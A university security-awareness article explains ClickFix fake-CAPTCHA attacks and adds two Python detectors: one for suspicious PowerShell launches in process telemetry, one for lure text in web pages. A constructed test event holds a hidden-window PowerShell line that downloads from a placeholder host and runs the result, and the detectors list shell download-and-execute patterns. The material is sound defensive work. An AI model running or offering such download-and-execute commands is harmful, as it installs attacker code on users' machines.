
Fake CAPTCHA, Real Threat: ClickFix Social Engineering Attacks

ClickFix attacks are a rapidly evolving threat that uses fake CAPTCHA pages to trick people into running malicious commands (often PowerShell) on their own devices. In every ClickFix case, the attacker relies on one thing: your participation. Most traditional phishing attempts and malicious sites are filtered or blocked long before they reach you. That is why ClickFix pushes you to take the extra steps yourself: by convincing you to run a command, the attacker gets past the protections already in place and installs malware that would otherwise be detected.

What is ClickFix?

ClickFix is a social engineering technique in which attackers compromise legitimate websites, replace normal verification steps such as CAPTCHAs with fake prompts, and instruct users to run malicious commands on their computers. These commands usually involve opening the Windows Run dialog or PowerShell and pasting in a script that appears to “fix” a problem or “verify” the user. In reality, the script downloads malware that compromises your device.

This technique has been observed across higher‑education institutions and is increasingly used to deploy malware families such as CORNFLAKE.V3, a backdoor capable of downloading additional payloads, collecting system information, and maintaining persistence on the device.

How Does It Work?

ClickFix attacks follow a simple pattern:

  1. You click on a link from a search result or ad, and as the page loads, a strange-looking CAPTCHA or pop‑up appears unexpectedly.
  2. Instead of asking you to click images or check a box, it tells you there’s a “problem” and you need to run a command to continue.
  3. The page instructs you to open the Run dialog (Windows + R), PowerShell, or Terminal and paste in a line of text.
  4. That command silently downloads malware onto your device. In many cases, it installs a backdoor such as CORNFLAKE.V3, which can download additional malicious files onto your system, collect system information, and stay hidden on your machine.

Because the attacker convinces you to run the command, your device treats it as a trusted action, making it much harder for security tools to block.
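The execution step described above leaves a recognisable trace in endpoint telemetry: a shell started from an interactive parent (the Run dialog is hosted by explorer.exe) whose command line fetches and runs remote content. The following detector is an added example written for this page, not code from the referenced vendors; the field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine), the sample events are constructed, and the verdict thresholds and the choice of explorer.exe as the only "interactive" parent are assumptions.

```python
"""
Added example: flag ClickFix-style process launches in process-creation events.
Sample events are constructed to resemble Sysmon Event ID 1 fields; none are
real telemetry. Thresholds and parent-process choices are assumptions.
"""
import re

# Assumption: a shell whose parent is explorer.exe was started by a person
# (Run dialog, Start menu), which is the ClickFix execution path.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits that match "silently downloads malware": a remote fetch,
# execution of fetched text, or a hidden/encoded invocation.
INDICATORS = {
    "remote_fetch": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b", re.I),
    "exec_fetched": re.compile(r"invoke-expression|\biex\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_cmd": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> dict:
    """Evaluate one process-creation event; returns hits and a verdict."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    user_launched = image in SHELLS and parent in INTERACTIVE_PARENTS
    # Assumed verdict rule: user-launched shell AND (fetch+execute, or a fetch
    # that hides itself, or an encoded command pasted by the user).
    fetch_and_run = "remote_fetch" in hits and "exec_fetched" in hits
    concealed_fetch = "remote_fetch" in hits and ("hidden_window" in hits or "encoded_cmd" in hits)
    suspicious = user_launched and (fetch_and_run or concealed_fetch or "encoded_cmd" in hits)
    return {"suspicious": suspicious, "hits": hits, "user_launched": user_launched}


def scan(events) -> list:
    """Return RecordIds of events that look like a ClickFix execution."""
    return [e["RecordId"] for e in events if score_event(e)["suspicious"]]


# Constructed sample events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {  # normal interactive use: user-launched, but no download/execute traits
        "RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
        "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    },
    {  # ClickFix pattern: pasted into Run, hidden window, fetch piped to execute
        "RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
        "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/verify | iex"',
    },
    {  # service-driven script that downloads: not user-launched, so not flagged
        "RecordId": 3, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
        "CommandLine": "powershell.exe -File C:\\scripts\\sync.ps1 Invoke-WebRequest",
    },
    {  # a plain fetch with no execution or concealment: below the threshold
        "RecordId": 4, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c curl http://example.invalid/readme.txt",
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["RecordId"], score_event(event))
    print("flagged:", scan(SAMPLE_EVENTS))
```

Event 4 shows why the rule requires more than a single indicator: a user fetching a text file from an interactive shell is ordinary behaviour, whereas fetch-and-execute in a hidden window from the Run dialog is the ClickFix signature.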

How Can I Spot a ClickFix Attempt?

Be cautious of any unfamiliar website, email, or pop-up that:

  • Asks you to open Windows Run (Windows + R)
  • Tells you to paste a command into PowerShell or Terminal
  • Claims you must run a script to “fix,” “verify,” or “continue”
  • Appears immediately after clicking a search result or ad
  • Displays a CAPTCHA that looks unusual, low‑quality, or out of place

If you encounter instructions like:

“Press Windows + R and paste the following command…”

…it is almost certainly malicious.
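The warning signs above can also be turned into a simple content check, for example in a mail or web filter or a browser add-on. The scanner below is an added example written for this page, not code from the Information Security Team or from the referenced reports: each rule mirrors one bullet from the list, the clipboard rule is an assumption about how such pages stage the command for pasting, the weights and threshold are assumed values, and both sample pages are constructed.

```python
"""
Added example: heuristic scoring of page text for ClickFix lure traits.
Rules follow the "How Can I Spot a ClickFix Attempt?" bullets; the weights,
the threshold and the clipboard rule are assumptions. Sample pages are
constructed, not captured from a real incident.
"""
import re

# (name, weight, pattern)
RULES = [
    # "Asks you to open Windows Run (Windows + R)"
    ("run_dialog", 3, re.compile(r"\bwin(dows)?\s*\+\s*r\b|\brun\s+dialog\b", re.I)),
    # "Tells you to paste a command into PowerShell or Terminal"
    ("paste_command", 3, re.compile(
        r"\bpaste\b.{0,60}\b(powershell|terminal|command prompt|cmd)\b|\bctrl\s*\+\s*v\b",
        re.I | re.S)),
    # "Claims you must run a script to 'fix', 'verify', or 'continue'"
    # (weak on its own: real CAPTCHAs use these words too)
    ("fix_verify_lure", 1, re.compile(r"\b(fix|verif(y|ication)|continue)\b", re.I)),
    # Assumption: the lure page writes the command to the clipboard from script
    ("clipboard_write", 2, re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I)),
    # A shell invocation visible anywhere in the page source
    ("shell_in_text", 2, re.compile(r"\b(powershell|pwsh|cmd)(\.exe)?\b\s+-", re.I)),
]
THRESHOLD = 5  # assumed: run_dialog + paste_command together is enough


def classify(page_text: str) -> dict:
    """Score page text against RULES; returns score, matched rule names, verdict."""
    hits = {name: weight for name, weight, rx in RULES if rx.search(page_text)}
    score = sum(hits.values())
    verdict = "clickfix" if score >= THRESHOLD else "benign"
    return {"score": score, "hits": sorted(hits), "verdict": verdict}


# Constructed sample: an ordinary image CAPTCHA (uses "verify"/"continue" only).
BENIGN_PAGE = """
<h2>Confirm you are human</h2>
<p>Select all images that contain a bus, then press Continue to verify.</p>
<label><input type="checkbox"> I'm not a robot</label>
"""

# Constructed sample: a ClickFix-style fake CAPTCHA. The staged command is
# deliberately elided; only its launcher prefix is kept for the rule to match.
LURE_PAGE = """
<div class="captcha">Verification Steps</div>
<ol>
  <li>Press Windows + R</li>
  <li>Press CTRL + V</li>
  <li>Press Enter</li>
</ol>
<script>
navigator.clipboard.writeText("powershell.exe -w hidden -c <payload omitted>");
</script>
"""

if __name__ == "__main__":
    print("benign sample:", classify(BENIGN_PAGE))
    print("lure sample:  ", classify(LURE_PAGE))
```

The benign CAPTCHA only trips the weak word rule and stays well under the threshold; the lure trips the Run-dialog and paste rules on its own, and the clipboard and shell rules push it further. Scoring several weak signals together is what keeps ordinary "verify you are human" pages from being flagged.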

If you suspect you may have interacted with a ClickFix prompt, please report it to the Information Security Team immediately (infosec@yorku.ca).

References:

  • https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
  • https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/